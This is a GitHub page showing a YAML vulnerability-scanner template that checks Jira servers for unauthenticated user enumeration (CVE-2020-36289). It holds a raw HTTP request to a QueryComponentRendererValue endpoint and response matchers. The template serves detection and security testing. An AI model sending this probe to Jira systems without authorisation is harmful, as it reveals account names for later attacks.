-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathjirausername.yaml
31 lines (28 loc) · 945 Bytes
/
jirausername.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
id: Jira Unauth User Enumeration (CVE-2020-36289)
info:
name: Jira Unauth User Enumeration (CVE-2020-36289)
author: nithissh
severity: low
description: An adversary can perform a Un-Auth User Enumeration
reference: unknown
tags: jira
requests:
- raw:
- |+
GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: regex
regex:
- 'user:admin'
part: body
- type: status
status:
- 200